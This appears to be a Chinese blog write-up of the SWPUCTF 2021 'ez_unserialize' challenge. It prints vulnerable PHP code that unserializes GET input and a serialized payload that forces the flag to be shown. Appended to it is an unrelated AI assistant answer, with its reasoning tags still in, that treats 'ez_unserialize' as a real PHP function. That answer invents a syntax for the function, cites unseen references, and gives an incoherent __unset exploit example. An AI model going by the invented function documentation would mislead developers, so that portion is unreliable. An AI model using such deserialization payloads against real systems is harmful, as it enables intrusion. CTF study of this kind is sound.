[SWPUCTF 2021 新生赛]ez_unserialize

项目场景:[SWPUCTF 2021 新生赛]ez_unserialize

提示:php反序列化


问题描述

打开环境,页面是一张动图,按照以往做题规律f12查看源代码

可以看到源码中存在一串注释,看格式明显是robots文件,而且可访问文件名被隐藏了,那么可以直接访问robots.txt,或者使用漏扫工具都可以

 

尽管前后都可以找到,但后者明显多了一个文件,但是不要抱有侥幸心理,flag.php里面是空的

访问/cl45s.php后得到了如下的php代码,接下来就到了这一题的关键,一眼看到最后的unserialize函数,瞬间就可以知道这是关于序列化的题目


 

 <?php

error_reporting(0);
show_source("cl45s.php");

class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }

        public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}

$p = $_GET['p'];
unserialize($p);

?>


 

 代码分析下来也很简单,wllm类中定义了两个共有属性,并在之后使用了魔术方法——__construct(类实例化类时调用)

方法中两个参数被赋值,之后又定义了__destruct()方法(销毁时调用),并在其中做了两个参数的比较

大致分析如此,接下来构造payload

O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

get上传后得到flag


<think>好的,我需要回答用户关于PHPez_unserialize函数的使用说明和示例的问题。首先,我应该先确认这个函数是否是PHP内置函数,或者是否是某些框架或库中的自定义函数。 用户提供的引用中提到,引用[1]指出ez_unserialize的基本语法是mixed ez_unserialize(string $str),看起来像是某个自定义函数,因为PHP内置的反序列化函数是unserialize(),而不是ez_unserialize。此外,引用[2]和引用[3]提到了CTF例题和PHP原生类的利用,这可能与反序列化漏洞有关。 接下来,我需要检查是否有官方文档或可靠的资源提到ez_unserialize。根据现有的信息,可能这个函数是某个特定项目或框架中的自定义函数,用于封装或扩展unserialize的功能。例如,可能添加了额外的安全检查或处理特定数据结构的逻辑。 用户可能需要了解这个函数的参数、返回值以及使用场景。根据引用[1],函数接受一个字符串参数并返回mixed类型的结果。通常,反序列化函数的作用是将序列化的字符串转换回PHP值。 在示例方面,可能需要展示如何将一个对象序列化后再用ez_unserialize还原,但需要注意如果这个函数有特殊处理,比如自动调用某些方法或处理异常,可能需要特别说明。 另外,引用[3]提到在反序列化过程中可能触发魔术方法,如__unset(),这涉及到反序列化漏洞的利用,可能在CTF题目中出现。因此,在示例中可能需要提到安全注意事项,比如不要反序列化不可信的输入。 由于没有找到官方资料,我需要假设这个函数的行为类似于unserialize,但可能有额外的封装。因此,在回答中需要明确说明这一点,并建议用户查阅相关项目的文档或源码以获取准确信息。 最后,根据用户提供的引用,可能需要引用这些来源来解释可能的用例或安全问题,同时生成相关问题帮助用户深入理解。</think>### PHP `ez_unserialize` 函数说明及示例 根据提供的引用信息,`ez_unserialize` 可能是一个自定义函数,其功能类似于 PHP 内置的 `unserialize()`,但具体实现可能因项目或框架而异。以下是基于现有信息的分析及示例说明: --- #### **1. 函数基本语法** ```php mixed ez_unserialize ( string $str ) ``` - **参数**:`$str` 为序列化后的字符串。 - **返回值**:反序列化后的 PHP 变量(可能是对象、数组、字符串等)[^1]。 --- #### **2. 功能解析** - 该函数用于将序列化字符串还原为原始数据结构。 - 与 `unserialize()` 类似,但在某些场景下可能包含额外逻辑(如自动调用魔术方法或安全检查)[^3]。 - **安全风险**:反序列化不可信输入可能导致代码执行(如触发 `__destruct()`、`__wakeup()` 等魔术方法),需谨慎使用[^2]。 --- #### **3. 示例代码** 假设 `ez_unserialize` 的功能类似 `unserialize()`: ```php // 序列化一个数组 $data = ["name" => "Alice", "age" => 25]; $serialized = serialize($data); // 输出: a:2:{s:4:"name";s:5:"Alice";s:3:"age";i:25;} // 使用 ez_unserialize 还原数据 $unserialized = ez_unserialize($serialized); print_r($unserialized); // 输出: Array ( [name] => Alice [age] => 25 ) ``` --- #### **4. 魔术方法与反序列化** 若反序列化对象,可能触发魔术方法: ```php class Example { public $var; public function __unset($name) { call_user_func($this->var); // 可能执行任意函数[^3] } } // 恶意序列化字符串(仅示例,实际需构造) $malicious = serialize(new Example()); $result = ez_unserialize($malicious); unset($result->handle->log); // 触发 __unset() ``` - **注意**:此类操作可能导致安全漏洞,需避免反序列化不可信数据[^3]。 --- #### **5. 使用场景** 1. **数据持久化存储与恢复**:如缓存、会话数据。 2. **CTF 题目与漏洞研究**:利用反序列化漏洞触发魔术方法。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值